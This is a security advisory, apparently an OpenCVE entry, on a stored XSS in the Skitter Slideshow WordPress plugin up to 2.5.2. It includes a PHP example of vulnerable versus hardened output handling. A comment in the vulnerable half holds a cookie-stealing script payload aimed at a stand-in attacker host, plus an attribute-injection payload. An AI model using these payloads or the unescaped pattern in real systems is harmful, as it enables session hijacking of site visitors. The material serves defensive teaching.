Impact
The Skitter Slideshow plugin for WordPress fails to sanitize or escape user-supplied input, so an attacker can inject JavaScript that the plugin stores and later serves to every visitor of the affected pages. This Stored XSS (CWE-79) can lead to session hijacking, credential theft, defacement, or execution of further malicious code in the victim's browser context. Because the payload runs within the site's own origin, it affects the confidentiality and integrity of the site for every user who views pages rendered by the plugin, including logged-in administrators whose sessions carry elevated privileges; availability is not directly affected beyond defacement.
Affected Systems
Thiago S.F.'s Skitter Slideshow plugin for WordPress is vulnerable in every release from the earliest available version through 2.5.2 inclusive. Any WordPress site with the plugin installed at version 2.5.2 or earlier is at risk.
Risk and Exploitability
A CVSS score of 5.9 places the issue at medium severity, and an EPSS value below 1 % indicates a low estimated probability of exploitation activity in the wild over the next 30 days. The vulnerability is not listed in the CISA KEV catalog. Based on the description, the likely attack vector is an administrative or content-creation screen that accepts arbitrary text into the plugin's settings or slideshow content without sanitization. The injected payload is persisted by the plugin and executes whenever any user views a page that renders it, running with the session and privileges of that viewer rather than those of the attacker. The practical check is therefore whether the installed plugin version is 2.5.2 or earlier, and which roles on the site can reach the plugin's settings or slide-editing screens.
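The pattern described above, shown as an added illustration in PHP (this is not the Skitter Slideshow plugin's own code; the option name skitter_demo_options, the caption and width fields, and the function names are assumptions made for the example). The first function echoes stored settings into markup verbatim, which is the shape of flaw a Stored XSS in plugin settings usually takes; the second pair sanitizes on save with a register_setting callback and escapes for the correct context at output time using standard WordPress helpers.

```php
<?php
// Added illustration, not code from the Skitter Slideshow plugin.
// Hypothetical option name and field layout; the real plugin's storage is not
// known from the advisory.

// --- Vulnerable pattern: trust stored settings at render time. ---
// A value saved through the settings screen is echoed into markup unchanged.
// A caption such as  <script>document.location='https://attacker.invalid/?c='+document.cookie</script>
// or a width such as  800" onmouseover="alert(1)
// persists in wp_options and runs in the browser of every visitor.
function skitter_demo_render_vulnerable() {
    $opts    = get_option( 'skitter_demo_options', array() );
    $caption = isset( $opts['caption'] ) ? $opts['caption'] : '';
    $width   = isset( $opts['width'] ) ? $opts['width'] : '800';
    echo '<div class="skitter" data-width="' . $width . '">';
    echo '<p class="caption">' . $caption . '</p>';
    echo '</div>';
}

// --- Hardened pattern: sanitize on save, escape on output. ---
// 1. A sanitize_callback keeps invalid input out of the database entirely.
function skitter_demo_sanitize_options( $input ) {
    $clean = array();
    // Width must be a positive integer; anything else falls back to a default.
    $clean['width'] = isset( $input['width'] ) ? absint( $input['width'] ) : 800;
    if ( 0 === $clean['width'] ) {
        $clean['width'] = 800;
    }
    // Captions may carry limited markup. wp_kses_post strips <script>, inline
    // event handlers and javascript: URLs while keeping <strong>, <a href>, etc.
    $clean['caption'] = isset( $input['caption'] ) ? wp_kses_post( $input['caption'] ) : '';
    return $clean;
}

add_action( 'admin_init', function () {
    register_setting(
        'skitter_demo',          // option group (assumed name)
        'skitter_demo_options',  // option name  (assumed name)
        array( 'sanitize_callback' => 'skitter_demo_sanitize_options' )
    );
} );

// 2. Escape for the exact output context regardless of what is stored. Data
//    may have been written before the sanitizer existed or by another code
//    path, so output escaping is not optional even with step 1 in place.
function skitter_demo_render_hardened() {
    $opts    = get_option( 'skitter_demo_options', array() );
    $width   = isset( $opts['width'] ) ? absint( $opts['width'] ) : 800;
    $caption = isset( $opts['caption'] ) ? $opts['caption'] : '';
    // Attribute context: esc_attr. HTML body that may contain allowed markup:
    // wp_kses_post. If no markup is ever needed, esc_html is the stricter choice.
    echo '<div class="skitter" data-width="' . esc_attr( $width ) . '">';
    echo '<p class="caption">' . wp_kses_post( $caption ) . '</p>';
    echo '</div>';
}
```

The two halves are deliberately separate: sanitizing on save limits what an attacker with settings access can store, while escaping on output protects every reader even when the stored value was written through a path that bypassed the sanitizer. Reviewing a plugin for this class of bug means locating each echo of option or post-meta data and confirming the escaping function matches the context (attribute, HTML body, URL, or JavaScript) rather than assuming the data was cleaned earlier.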
OpenCVE Enrichment